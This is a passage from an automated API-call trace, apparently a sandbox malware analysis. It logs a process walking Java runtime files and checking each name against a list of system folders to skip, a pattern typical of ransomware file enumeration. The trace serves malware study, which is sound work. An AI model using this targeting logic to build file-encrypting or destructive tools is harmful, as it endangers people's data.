lstrcmpiW (lpString1="tnameserv.exe", lpString2="recovery") returned 1 [0069.761] lstrcmpiW (lpString1="tnameserv.exe", lpString2="perflogs") returned 1 [0069.761] lstrcmpiW (lpString1="tnameserv.exe", lpString2="documents and settings") returned 1 [0069.761] lstrcmpiW (lpString1="tnameserv.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.761] lstrcmpiW (lpString1="tnameserv.exe", lpString2="system volume information") returned 1 [0069.761] lstrcmpiW (lpString1="tnameserv.exe", lpString2="msocache") returned 1 [0069.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tnameserv.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tnameserv.exe", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tnameserv.exe", lpUsedDefaultChar=0x0) returned 13 [0069.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0069.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tnameserv.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tnameserv.exe", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tnameserv.exe", lpUsedDefaultChar=0x0) returned 13 [0069.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0069.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0069.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0069.761] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13840, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="unpack.dll", cAlternateFileName="")) returned 1 [0069.762] lstrcmpiW (lpString1="unpack.dll", lpString2=".") returned 1 [0069.762] lstrcmpiW (lpString1="unpack.dll", lpString2="..") returned 1 [0069.762] lstrcmpiW (lpString1="unpack.dll", lpString2="...") returned 1 [0069.762] lstrcmpiW (lpString1="unpack.dll", lpString2="windows") returned -1 [0069.762] lstrcmpiW (lpString1="unpack.dll", lpString2="recovery") returned 1 [0069.762] lstrcmpiW (lpString1="unpack.dll", lpString2="perflogs") returned 1 [0069.762] lstrcmpiW (lpString1="unpack.dll", lpString2="documents and settings") returned 1 [0069.762] lstrcmpiW (lpString1="unpack.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.762] lstrcmpiW (lpString1="unpack.dll", lpString2="system volume information") returned 1 [0069.762] lstrcmpiW (lpString1="unpack.dll", lpString2="msocache") returned 1 [0069.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unpack.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unpack.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="unpack.dll", lpUsedDefaultChar=0x0) returned 10 [0069.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unpack.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unpack.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="unpack.dll", lpUsedDefaultChar=0x0) returned 10 [0069.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0069.762] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x30240, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="unpack200.exe", cAlternateFileName="UNPACK~1.EXE")) returned 1 [0069.762] lstrcmpiW (lpString1="unpack200.exe", lpString2=".") returned 1 [0069.762] lstrcmpiW (lpString1="unpack200.exe", lpString2="..") returned 1 [0069.762] lstrcmpiW (lpString1="unpack200.exe", lpString2="...") returned 1 [0069.762] lstrcmpiW (lpString1="unpack200.exe", lpString2="windows") returned -1 [0069.762] lstrcmpiW (lpString1="unpack200.exe", lpString2="recovery") returned 1 [0069.762] lstrcmpiW (lpString1="unpack200.exe", lpString2="perflogs") returned 1 [0069.762] lstrcmpiW (lpString1="unpack200.exe", lpString2="documents and settings") returned 1 [0069.762] lstrcmpiW (lpString1="unpack200.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.762] lstrcmpiW (lpString1="unpack200.exe", lpString2="system volume information") returned 1 [0069.762] lstrcmpiW (lpString1="unpack200.exe", lpString2="msocache") returned 1 [0069.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unpack200.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unpack200.exe", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="unpack200.exe", lpUsedDefaultChar=0x0) returned 13 [0069.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unpack200.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unpack200.exe", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="unpack200.exe", lpUsedDefaultChar=0x0) returned 13 [0069.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.763] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="verify.dll", cAlternateFileName="")) returned 1 [0069.763] lstrcmpiW (lpString1="verify.dll", lpString2=".") returned 1 [0069.763] lstrcmpiW (lpString1="verify.dll", lpString2="..") returned 1 [0069.763] lstrcmpiW (lpString1="verify.dll", lpString2="...") returned 1 [0069.763] lstrcmpiW (lpString1="verify.dll", lpString2="windows") returned -1 [0069.763] lstrcmpiW (lpString1="verify.dll", lpString2="recovery") returned 1 [0069.763] lstrcmpiW (lpString1="verify.dll", lpString2="perflogs") returned 1 [0069.763] lstrcmpiW (lpString1="verify.dll", lpString2="documents and settings") returned 1 [0069.763] lstrcmpiW (lpString1="verify.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.763] lstrcmpiW (lpString1="verify.dll", lpString2="system volume information") returned 1 [0069.763] lstrcmpiW (lpString1="verify.dll", lpString2="msocache") returned 1 [0069.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verify.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verify.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="verify.dll", lpUsedDefaultChar=0x0) returned 10 [0069.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verify.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verify.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="verify.dll", lpUsedDefaultChar=0x0) returned 10 [0069.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.763] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5e40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="w2k_lsa_auth.dll", cAlternateFileName="W2K_LS~1.DLL")) returned 1 [0069.763] lstrcmpiW (lpString1="w2k_lsa_auth.dll", lpString2=".") returned 1 [0069.763] lstrcmpiW (lpString1="w2k_lsa_auth.dll", lpString2="..") returned 1 [0069.763] lstrcmpiW (lpString1="w2k_lsa_auth.dll", lpString2="...") returned 1 [0069.763] lstrcmpiW (lpString1="w2k_lsa_auth.dll", lpString2="windows") returned -1 [0069.763] lstrcmpiW (lpString1="w2k_lsa_auth.dll", lpString2="recovery") returned 1 [0069.763] lstrcmpiW (lpString1="w2k_lsa_auth.dll", lpString2="perflogs") returned 1 [0069.763] lstrcmpiW (lpString1="w2k_lsa_auth.dll", lpString2="documents and settings") returned 1 [0069.764] lstrcmpiW (lpString1="w2k_lsa_auth.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.764] lstrcmpiW (lpString1="w2k_lsa_auth.dll", lpString2="system volume information") returned 1 [0069.764] lstrcmpiW (lpString1="w2k_lsa_auth.dll", lpString2="msocache") returned 1 [0069.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="w2k_lsa_auth.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0069.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="w2k_lsa_auth.dll", cchWideChar=16, lpMultiByteStr=0x241358, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w2k_lsa_auth.dll", lpUsedDefaultChar=0x0) returned 16 [0069.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="w2k_lsa_auth.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="w2k_lsa_auth.dll", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w2k_lsa_auth.dll", lpUsedDefaultChar=0x0) returned 16 [0069.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0069.764] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1ae40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="WindowsAccessBridge-64.dll", cAlternateFileName="WINDOW~1.DLL")) returned 1 [0069.764] lstrcmpiW (lpString1="WindowsAccessBridge-64.dll", lpString2=".") returned 1 [0069.764] lstrcmpiW (lpString1="WindowsAccessBridge-64.dll", lpString2="..") returned 1 [0069.764] lstrcmpiW (lpString1="WindowsAccessBridge-64.dll", lpString2="...") returned 1 [0069.764] lstrcmpiW (lpString1="WindowsAccessBridge-64.dll", lpString2="windows") returned 1 [0069.764] lstrcmpiW (lpString1="WindowsAccessBridge-64.dll", lpString2="recovery") returned 1 [0069.764] lstrcmpiW (lpString1="WindowsAccessBridge-64.dll", lpString2="perflogs") returned 1 [0069.764] lstrcmpiW (lpString1="WindowsAccessBridge-64.dll", lpString2="documents and settings") returned 1 [0069.764] lstrcmpiW (lpString1="WindowsAccessBridge-64.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.764] lstrcmpiW (lpString1="WindowsAccessBridge-64.dll", lpString2="system volume information") returned 1 [0069.764] lstrcmpiW (lpString1="WindowsAccessBridge-64.dll", lpString2="msocache") returned 1 [0069.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0069.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsAccessBridge-64.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0069.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsAccessBridge-64.dll", cchWideChar=26, lpMultiByteStr=0x240f48, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsAccessBridge-64.dll", lpUsedDefaultChar=0x0) returned 26 [0069.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0069.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0069.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsAccessBridge-64.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0069.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsAccessBridge-64.dll", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsAccessBridge-64.dll", lpUsedDefaultChar=0x0) returned 26 [0069.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0069.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.765] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2f040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="wsdetect.dll", cAlternateFileName="")) returned 1 [0069.765] lstrcmpiW (lpString1="wsdetect.dll", lpString2=".") returned 1 [0069.765] lstrcmpiW (lpString1="wsdetect.dll", lpString2="..") returned 1 [0069.765] lstrcmpiW (lpString1="wsdetect.dll", lpString2="...") returned 1 [0069.765] lstrcmpiW (lpString1="wsdetect.dll", lpString2="windows") returned 1 [0069.765] lstrcmpiW (lpString1="wsdetect.dll", lpString2="recovery") returned 1 [0069.765] lstrcmpiW (lpString1="wsdetect.dll", lpString2="perflogs") returned 1 [0069.765] lstrcmpiW (lpString1="wsdetect.dll", lpString2="documents and settings") returned 1 [0069.765] lstrcmpiW (lpString1="wsdetect.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.765] lstrcmpiW (lpString1="wsdetect.dll", lpString2="system volume information") returned 1 [0069.765] lstrcmpiW (lpString1="wsdetect.dll", lpString2="msocache") returned 1 [0069.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wsdetect.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wsdetect.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wsdetect.dll", lpUsedDefaultChar=0x0) returned 12 [0069.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wsdetect.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wsdetect.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wsdetect.dll", lpUsedDefaultChar=0x0) returned 12 [0069.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0069.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.765] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="zip.dll", cAlternateFileName="")) returned 1 [0069.765] lstrcmpiW (lpString1="zip.dll", lpString2=".") returned 1 [0069.765] lstrcmpiW (lpString1="zip.dll", lpString2="..") returned 1 [0069.765] lstrcmpiW (lpString1="zip.dll", lpString2="...") returned 1 [0069.765] lstrcmpiW (lpString1="zip.dll", lpString2="windows") returned 1 [0069.765] lstrcmpiW (lpString1="zip.dll", lpString2="recovery") returned 1 [0069.765] lstrcmpiW (lpString1="zip.dll", lpString2="perflogs") returned 1 [0069.765] lstrcmpiW (lpString1="zip.dll", lpString2="documents and settings") returned 1 [0069.766] lstrcmpiW (lpString1="zip.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.766] lstrcmpiW (lpString1="zip.dll", lpString2="system volume information") returned 1 [0069.766] lstrcmpiW (lpString1="zip.dll", lpString2="msocache") returned 1 [0069.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zip.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zip.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zip.dll", lpUsedDefaultChar=0x0) returned 7 [0069.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zip.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zip.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zip.dll", lpUsedDefaultChar=0x0) returned 7 [0069.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0069.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0069.766] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="zip.dll", cAlternateFileName="")) returned 0 [0069.766] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0069.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0069.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0069.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0069.766] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcac, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="COPYRIGHT", cAlternateFileName="COPYRI~1")) returned 1 [0069.766] lstrcmpiW (lpString1="COPYRIGHT", lpString2=".") returned 1 [0069.766] lstrcmpiW (lpString1="COPYRIGHT", lpString2="..") returned 1 [0069.766] 